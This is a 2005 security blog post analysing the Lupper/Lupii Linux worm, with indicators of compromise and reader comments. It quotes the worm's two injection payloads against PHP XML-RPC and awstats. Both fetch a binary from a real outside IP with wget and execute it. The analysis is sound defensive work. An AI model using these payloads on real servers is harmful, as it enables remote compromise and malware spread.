« Nepenthes: Malware Collection Tool | Main | Updated Windows Defender Tool (Nov, 2005) »

New Worm: Lupper/Lupii

A new Linux worm is on the loose, this one targetting a couple of different web bugs. Here are some writeups:

The worm operates by scanning for systems with TCP port 80 open, then launching a series of attacks by scanning for common URLs, some of which are below:

  • /xmlrpc.php
  • /xmlrpc/xmlrpc.php
  • /xmlsrv/xmlrpc.php
  • /blog/xmlrpc.php
  • /drupal/xmlrpc.php
  • /community/xmlrpc.php
  • /blogs/xmlrpc.php
  • /blogs/xmlsrv/xmlrpc.php
  • /blog/xmlsrv/xmlrpc.php
  • /blogtest/xmlsrv/xmlrpc.php
  • /b2/xmlsrv/xmlrpc.php
  • /b2evo/xmlsrv/xmlrpc.php
  • /wordpress/xmlrpc.php
  • /phpgroupware/xmlrpc.php

Part of the PHP XML RPC attack involves a POST method to launch the binary, which looks something like this:

<methodcall><methodname></methodname></methodcall><p>test.method</p><params><param /><value><name></name></value></params><p>',''));echo '_begin_';echo `cd /tmp;wget 62.101.193.244/lupii;chmod +x lupii;./lupii 62.101.193.244 `;echo '_end_';exit;/*

In the case of the awstats hole, the attack takes this form (you can do the printf() style formatting yourself, and reassemble the lines as needed):

GET %sawstats.pl?configdir=|echo;echo%%20YYY;cd%%20%%2ftmp%%3bwget%%2062%%2e101 %%2e193%%2e244%%2flupii%%3bchmod%%20%%2bx%%20lupii%%3b%%2e%%2flupii%%2062 %%2e101%%2e193%%2e244;echo%%20YYY;echo|

Basically it tries to abuse unescaped commands to fetch the file and then launch it. The binary itself has many similarities to the Linux Slapper worm from 2002, joining a P2P network for commands (in theory more resilient than a centrally located botnet channel). For an excellent writeup of the Slapper worm, read Attack Trends - An Analysis of the Slapper Worm from Ivan Arce and Elias Levy, which was published in an early volume of the IEEE magazine Security And Privacy.

Hallmarks of this worm are as follows:

  • logfile marks for the XML RPC PHP scripts with the arguments similar to the ones shown above
  • logfile marks for the awstats holes similar to those shown above
  • Linux boxes listening on UDP ports 7111 and 7222.
  • traffic to and from UDP ports 7111 and 7222 (as dest ports, using the normal ephemeral source port range)
  • traffic to and from the IP address 62.101.193.244
  • infected boxes will have a process named "lupii" and a file, "/tmp/lupii", around. It doesn't appear to use any kernel rootkits to hide the process.

I've had a chance (via JW, who sent me the captured binaries) to analyze the executables. There are at least two in circulation, one targetting only PHP XML RPC sites and the associated bugs, and one targetting that set of holes and the well known awstats bugs. Aside from that, they're nearly identical. I generated some static callgraphs using Python, Graphviz, and objdump, and have them below.


Figure 1: Callgraph generated using "objdump" on a Linux system from the first of the two Lupii binaries. Click the image for a larger version.


Figure 1: Callgraph generated using "objdump" on a Linux system from the scond of the two Lupii binaries, the one that attacks both PHP XML RPC and awstats bugs. Click the image for a larger version.

More info on the bugs abused:

It's not that many large enterprises are running the vulnerable applications officially, I would expect more problems with this malware from either unofficial sites set up within (or outside of) an organization or hosting sites and/or broadband sites. In my looking around, I don't see this as a widespread problem at this time. An open question I have is about how the request is made (I don't have the time to fully analyze this code right now). It seems to me that if it's using IP based "Host:" parameters in the request, it won't get virtual hosts that are using this vulnerable code. This may have a huge effect in slowing down this malware. A better option would have been to spread using named hosts found through a search engine.

November 7, 2005 in new worms | Permalink
Tell others: digg submit | del.icio.us this | Reddit

Comments

One thing to note that doesn't appear in the Symantec (at least) Incredibly Grotesque and Horrible Linux Worm Warning is that distribution of the worm's executable is from a central point, like some previous Linux worm(s) (lpdw0rm for example).

I've only gotten 2 groups of hits from this worm on my basement server (static IP address, though). Each group of hits had a different IP address for downloading the worm's executable. Both IP addresses sent by worms to my basement server were unavailable, suggesting that *someone* is aware of the central point distribution, and actively works to shut them down.

Posted by: Bruce Ediger | Nov 9, 2005 1:48:10 PM

Found a few attempts for the awstats.pl attack on one of my coloc servers. Was unsuccessful, but it did bring me to your blog and incidently earned you a bookmark. Thanks for the info.

Posted by: Jon Larabee | Nov 14, 2005 12:42:48 PM

a blog about the worm problem, technology, detection, and defenses

Posted by: Miry | Aug 26, 2008 6:07:30 AM

The comments to this entry are closed.